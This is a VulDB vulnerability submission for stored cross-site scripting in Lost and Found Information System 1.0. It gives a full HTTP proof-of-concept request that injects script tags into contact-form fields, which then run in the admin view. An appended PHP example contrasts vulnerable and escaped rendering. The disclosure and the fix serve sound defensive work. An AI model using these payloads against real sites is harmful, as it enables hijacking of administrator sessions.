Submission #155183: Stored XSS in Lost and Found Information System 1.0 View message sent from contact form (Info)

Title: Stored XSS in Lost and Found Information System 1.0 View message sent from contact form
Description:
Detail: Stored XSS in Lost and Found Information System 1.0 in the admin "View message sent from contact form" page
Source: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
Product: Lost and Found Information System
Version: 1.0
Request:

POST /php-lfis/classes/Master.php?f=save_inquiry HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3651031312771010866996354889
Content-Length: 839
Origin: http://localhost
Connection: close
Referer: http://localhost/php-lfis/?page=contact
Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=5d8ijq26o4ufqpqn4luc1nmpak
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------3651031312771010866996354889
Content-Disposition: form-data; name="id"


-----------------------------3651031312771010866996354889
Content-Disposition: form-data; name="visitor"


-----------------------------3651031312771010866996354889
Content-Disposition: form-data; name="fullname"

Tuan"><script>alert('1')</script>
-----------------------------3651031312771010866996354889
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------3651031312771010866996354889
Content-Disposition: form-data; name="contact"

Tuan"><script>alert('2')</script>
-----------------------------3651031312771010866996354889
Content-Disposition: form-data; name="message"

Tuan"><script>alert('3')</script>
-----------------------------3651031312771010866996354889--

View effect: /php-lfis/admin/?page=inquiries/view_inquiry&id=2
Source: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
User: huutuanbg97 (UID 45015)
Submitted: 2023-05-11 15:33 (3 years ago)
Moderation: 2023-05-12 08:01 (16 hours later)
Status: Accepted
VulDB Entry: 228887 [SourceCodester Lost and Found Information System 1.0 Contact Form Master.php?f=save_inquiry fullname/contact/message Cross Site Scripting]
Points: 20
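The submission shows the attack (unescaped fullname, contact and message fields stored by save_inquiry and later rendered in the admin view_inquiry page) but not the rendering code. The following is an added example, not code from the Lost and Found Information System project or from the submitter: it models an admin view that interpolates a stored inquiry row into HTML, first in the vulnerable form the report describes, then hardened with context-appropriate escaping. The field names come from the request above; the sample row, the function names and the HTML layout are assumptions.

```php
<?php
// Added example (not the project's view_inquiry code): a minimal model of an
// admin "view inquiry" page rendering a row saved by the contact form.
declare(strict_types=1);

// Constructed sample row mirroring the PoC payloads from the submission.
// The e-mail address is a placeholder, not the one from the report.
const SAMPLE_ROW = [
    'id'       => 2,
    'fullname' => 'Tuan"><script>alert(\'1\')</script>',
    'email'    => 'tuan@example.com',
    'contact'  => 'Tuan"><script>alert(\'2\')</script>',
    'message'  => 'Tuan"><script>alert(\'3\')</script>',
];

/**
 * Vulnerable pattern: stored values are concatenated straight into markup.
 * A `"` in fullname/contact closes the value="" attribute, and a `<script>`
 * in message lands in the page body; both run in the administrator's browser.
 */
function render_inquiry_vulnerable(array $row): string
{
    return '<input type="text" value="' . $row['fullname'] . '">'
         . '<input type="text" value="' . $row['contact'] . '">'
         . '<div class="message">' . $row['message'] . '</div>';
}

/** Escape a string for use in HTML text or a double-quoted attribute. */
function e(string $s): string
{
    // ENT_QUOTES: a `"` can no longer terminate the attribute.
    // ENT_SUBSTITUTE: invalid UTF-8 yields U+FFFD instead of an empty string,
    // so a malformed record still shows up in the admin view.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Hardened form: every stored field is escaped for the context it lands in. */
function render_inquiry_safe(array $row): string
{
    return '<input type="text" value="' . e($row['fullname']) . '">'
         . '<input type="text" value="' . e($row['contact']) . '">'
         // Escape first, then add <br> for line breaks; the reverse order
         // would escape the <br> tags that nl2br inserts.
         . '<div class="message">' . nl2br(e($row['message'])) . '</div>';
}

/** Regression check used below: a raw <script> tag must never reach output. */
function contains_raw_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

if (PHP_SAPI === 'cli') {
    $vuln = render_inquiry_vulnerable(SAMPLE_ROW);
    $safe = render_inquiry_safe(SAMPLE_ROW);
    printf("vulnerable output carries a raw <script>: %s\n", contains_raw_script($vuln) ? 'yes' : 'no');
    printf("hardened output carries a raw <script>:   %s\n", contains_raw_script($safe) ? 'yes' : 'no');
    echo $safe, PHP_EOL;
}
```

Run with `php view_inquiry_example.php`; the vulnerable renderer reports `yes` and the hardened one `no`. Output encoding at the point of rendering is the fix that closes the issue; length and character-set validation in save_inquiry is worth adding as defence in depth, but on its own it does not make the admin view safe, because the same rows can be displayed elsewhere or inserted by other paths.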
